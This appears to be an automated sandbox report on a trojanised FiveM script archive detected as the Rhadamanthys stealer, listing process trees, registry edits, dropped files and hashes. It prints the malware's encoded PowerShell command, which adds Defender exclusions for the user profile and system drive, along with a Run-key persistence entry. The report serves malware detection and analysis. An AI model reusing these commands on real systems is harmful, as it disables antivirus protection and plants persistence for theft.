Analysis Overview
SHA256
38c5b0767ba5a3b10ad9a158b3493ae24096c2993994b06783d8f7266e3b4bc2
Threat Level: Known bad
The file SKRIPTGG-FIVEM-main.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Loads dropped DLL
UPX packed file
Executes dropped EXE
Adds Run key to start application
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-27 17:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
133s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\license.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
149s
Max time network
162s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main.zip
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
90s
Max time network
92s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\README.md
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:11
Platform
win11-20240221-en
Max time kernel
37s
Max time network
33s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2132 created 3056 | N/A | C:\Users\Admin\AppData\Local\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar"
C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\svchost.exe
"C:\Users\Admin\AppData\Local\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zO4C5FB887\launcher.exe
| MD5 | 620024df612c13a4a33cf785384c2086 |
| SHA1 | a6ae999723bea18c6d3acf2c52ed682f6226b7be |
| SHA256 | cd825788095cd61de39d98d6365ed80004cc55a64f4f115ef6bf532617bb0af1 |
| SHA512 | 34d4d8a423d98bf0b8d4f18dc980bed97e9492f0817bb1e2dff99fc8d9d0cfaa2687514eff7717b1310a2c858236614490e980390612901e08b69b6ded451bdd |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | aba4fcf0d72b487887f315202bc43ae4 |
| SHA1 | de51440c742c58f52f3b7cc2a1fcda5abd3d1ca8 |
| SHA256 | 8f312c17c2a525ac9bc0838e4d9f69db5bb20478ffa4880fb3a8b98caf0e25ef |
| SHA512 | fed41d5eb4a61c43bb3032c0d0b3d347d6b89a06d2928155f2e0baa59295ae71d3e689c3c78a584f2db64fd5ab3a06578623a8d41d7055b535c4d2317aef2bf9 |
C:\Users\Admin\AppData\Local\svchost.exe
| MD5 | 8a6f1580a5b9b94d7cd47cc6b1af1b9a |
| SHA1 | e68768afd59e18091d345cb300e859572e8d4c5c |
| SHA256 | bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe |
| SHA512 | 1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309 |
memory/640-37-0x0000000004910000-0x0000000004946000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI35122\python310.dll
| MD5 | 3f782cf7874b03c1d20ed90d370f4329 |
| SHA1 | 08a2b4a21092321de1dcad1bb2afb660b0fa7749 |
| SHA256 | 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6 |
| SHA512 | 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857 |
memory/640-49-0x0000000004A20000-0x0000000004A30000-memory.dmp
memory/4632-63-0x00007FFC933F0000-0x00007FFC93856000-memory.dmp
memory/640-48-0x0000000005060000-0x000000000568A000-memory.dmp
memory/640-47-0x0000000073150000-0x0000000073901000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI35122\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 1790216d83f58292e218f047c003963e |
| SHA1 | d6b4af9866f7e099d1db2acbdcb2dbf3e8ce1d1f |
| SHA256 | 3ecb40da9e5660dba9a9ee702215d62c77143e9c5eeee09e241631b20453ba85 |
| SHA512 | b34de3972c8813838fab8925738a53a896e57cdabcec6faa59f4f8811ac50ca49c2888c855c3a62645dbdecb2951bb25b7b6f0735347afc60481c978d6dff096 |
C:\Users\Admin\AppData\Local\Temp\explorer.exe
| MD5 | 1c58166821c2996a57c7c5cc94afcc6a |
| SHA1 | a518cb16ba7eebedd6aa66e6e45a910426727444 |
| SHA256 | d36b123038a2d40fcf6fca7ba2a5b20648e0b82b3b65759109d53f4bb430bc89 |
| SHA512 | 44f337db1b4e32247ba4aee5f1d6ff764be8a056fff1871f7f1b2ed452317b071291d436c68266572e1b61236ea195d7e217ab87e63bf23cb5343c50e5bc8058 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_socket.pyd
| MD5 | 0dd957099cf15d172d0a343886fb7c66 |
| SHA1 | 950f7f15c6accffac699c5db6ce475365821b92a |
| SHA256 | 8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a |
| SHA512 | 3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_lzma.pyd
| MD5 | 7c66f33a67fbb4d99041f085ef3c6428 |
| SHA1 | e1384891df177b45b889459c503985b113e754a3 |
| SHA256 | 32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866 |
| SHA512 | d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_hashlib.pyd
| MD5 | 13f99120a244ab62af1684fbbc5d5a7e |
| SHA1 | 5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724 |
| SHA256 | 11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b |
| SHA512 | 46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_decimal.pyd
| MD5 | 2030438e4f397a7d4241a701a3ca2419 |
| SHA1 | 28b8d06135cd1f784ccabda39432cc83ba22daf7 |
| SHA256 | 07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72 |
| SHA512 | 767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_bz2.pyd
| MD5 | f6e387f20808828796e876682a328e98 |
| SHA1 | 6679ae43b0634ac706218996bac961bef4138a02 |
| SHA256 | 8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b |
| SHA512 | ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\unicodedata.pyd
| MD5 | dfa1f0cd0ad295b31cb9dda2803bbd8c |
| SHA1 | cc68460feae2ff4e9d85a72be58c8011cb318bc2 |
| SHA256 | 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10 |
| SHA512 | 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\select.pyd
| MD5 | 5c66bcf3cc3c364ecac7cf40ad28d8f0 |
| SHA1 | faf0848c231bf120dc9f749f726c807874d9d612 |
| SHA256 | 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc |
| SHA512 | 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libcrypto-1_1.dll
| MD5 | e5aecaf59c67d6dd7c7979dfb49ed3b0 |
| SHA1 | b0a292065e1b3875f015277b90d183b875451450 |
| SHA256 | 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1 |
| SHA512 | 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_ctypes.pyd
| MD5 | 48ce90022e97f72114a95630ba43b8fb |
| SHA1 | f2eba0434ec204d8c6ca4f01af33ef34f09b52fd |
| SHA256 | 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635 |
| SHA512 | 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8 |
C:\Users\Admin\AppData\Local\Temp\_MEI35122\base_library.zip
| MD5 | 483d9675ef53a13327e7dfc7d09f23fe |
| SHA1 | 2378f1db6292cd8dc4ad95763a42ad49aeb11337 |
| SHA256 | 70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e |
| SHA512 | f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5 |
memory/4632-72-0x00007FFC93DF0000-0x00007FFC93E08000-memory.dmp
memory/4632-73-0x00007FFC93DC0000-0x00007FFC93DEC000-memory.dmp
memory/2132-74-0x00000000006B0000-0x000000000071D000-memory.dmp
memory/4632-75-0x00007FFC96C40000-0x00007FFC96C64000-memory.dmp
memory/4632-71-0x00007FFC98F10000-0x00007FFC98F1F000-memory.dmp
C:\Users\Admin\activate.bat
| MD5 | fbcbd43fa00e29f002495e4ab2dc4782 |
| SHA1 | 75aad7a3fa21226bf37ff89da953743d2b650dc0 |
| SHA256 | 7a58a034c76b65053744b7d2a443e487e1993aab50642a62f7f388d223e5f648 |
| SHA512 | 4f26971331fbe1d40e65d493f9417ebcca5e331b61285da2575629b7cd57bdb35ec480cf3ef9a1df48c949360ba9038797575a6181d79b52e1092e4f98bebb3e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0zqqx0o.n4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/640-77-0x0000000005740000-0x0000000005762000-memory.dmp
memory/640-86-0x00000000057F0000-0x0000000005856000-memory.dmp
memory/640-87-0x00000000058D0000-0x0000000005936000-memory.dmp
memory/640-88-0x0000000005940000-0x0000000005C97000-memory.dmp
memory/640-89-0x0000000005DA0000-0x0000000005DBE000-memory.dmp
memory/640-90-0x0000000005DC0000-0x0000000005E0C000-memory.dmp
memory/4632-91-0x00007FFC933F0000-0x00007FFC93856000-memory.dmp
memory/5020-118-0x00007FFC933F0000-0x00007FFC93856000-memory.dmp
memory/5020-137-0x00007FFC98F10000-0x00007FFC98F28000-memory.dmp
memory/5020-138-0x00007FFC96C30000-0x00007FFC96C5C000-memory.dmp
memory/5020-139-0x00007FFC99070000-0x00007FFC9907D000-memory.dmp
memory/5020-140-0x00007FFC96760000-0x00007FFC96779000-memory.dmp
memory/5020-134-0x00007FFC96C60000-0x00007FFC96C84000-memory.dmp
memory/5020-123-0x00007FFC99080000-0x00007FFC9908F000-memory.dmp
memory/2132-141-0x0000000004200000-0x0000000004600000-memory.dmp
memory/2132-143-0x0000000004200000-0x0000000004600000-memory.dmp
memory/2132-142-0x0000000004200000-0x0000000004600000-memory.dmp
memory/2132-144-0x00007FFCA2B20000-0x00007FFCA2D29000-memory.dmp
memory/2132-145-0x0000000004200000-0x0000000004600000-memory.dmp
memory/2132-147-0x0000000075300000-0x0000000075552000-memory.dmp
memory/4948-148-0x00000000002C0000-0x00000000002C9000-memory.dmp
memory/640-149-0x0000000006D30000-0x0000000006D64000-memory.dmp
memory/2132-152-0x00000000006B0000-0x000000000071D000-memory.dmp
memory/640-151-0x00000000706C0000-0x000000007070C000-memory.dmp
memory/640-163-0x0000000006F90000-0x0000000007034000-memory.dmp
memory/4948-165-0x00000000020E0000-0x00000000024E0000-memory.dmp
memory/640-166-0x0000000073150000-0x0000000073901000-memory.dmp
memory/4948-167-0x00007FFCA2B20000-0x00007FFCA2D29000-memory.dmp
memory/640-168-0x0000000004A20000-0x0000000004A30000-memory.dmp
memory/2132-164-0x00007FFCA2B20000-0x00007FFCA2D29000-memory.dmp
memory/640-162-0x0000000006D70000-0x0000000006D8E000-memory.dmp
memory/640-150-0x000000007EED0000-0x000000007EEE0000-memory.dmp
memory/5020-169-0x00007FFC933F0000-0x00007FFC93856000-memory.dmp
memory/4948-171-0x00000000020E0000-0x00000000024E0000-memory.dmp
memory/4948-172-0x0000000075300000-0x0000000075552000-memory.dmp
memory/4948-174-0x00007FFCA2B20000-0x00007FFCA2D29000-memory.dmp
memory/640-175-0x00000000070F0000-0x000000000710A000-memory.dmp
memory/640-173-0x0000000007730000-0x0000000007DAA000-memory.dmp
memory/640-176-0x0000000007180000-0x000000000718A000-memory.dmp
memory/640-177-0x0000000007380000-0x0000000007416000-memory.dmp
memory/4948-179-0x00000000020E0000-0x00000000024E0000-memory.dmp
memory/640-178-0x0000000007300000-0x0000000007311000-memory.dmp
memory/4948-180-0x00007FFCA2B20000-0x00007FFCA2D29000-memory.dmp
memory/640-181-0x0000000007340000-0x000000000734E000-memory.dmp
memory/640-182-0x0000000007350000-0x0000000007365000-memory.dmp
memory/640-183-0x0000000007440000-0x000000000745A000-memory.dmp
memory/640-184-0x0000000007430000-0x0000000007438000-memory.dmp
memory/640-187-0x0000000073150000-0x0000000073901000-memory.dmp
memory/5020-188-0x00007FFC96C60000-0x00007FFC96C84000-memory.dmp
memory/5020-189-0x00007FFC933F0000-0x00007FFC93856000-memory.dmp
memory/5020-196-0x00007FFC933F0000-0x00007FFC93856000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-27 17:10
Reported
2024-03-27 17:13
Platform
win11-20240221-en
Max time kernel
145s
Max time network
96s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2660 created 2556 | N/A | C:\Users\Admin\AppData\Local\svchost.exe | C:\Windows\system32\sihost.exe |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
| N/A | N/A | C:\Users\Admin\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" | C:\Users\Admin\explorer.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\svchost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\explorer.exe
"C:\Users\Admin\AppData\Local\Temp\explorer.exe"
C:\Users\Admin\AppData\Local\svchost.exe
"C:\Users\Admin\AppData\Local\svchost.exe"
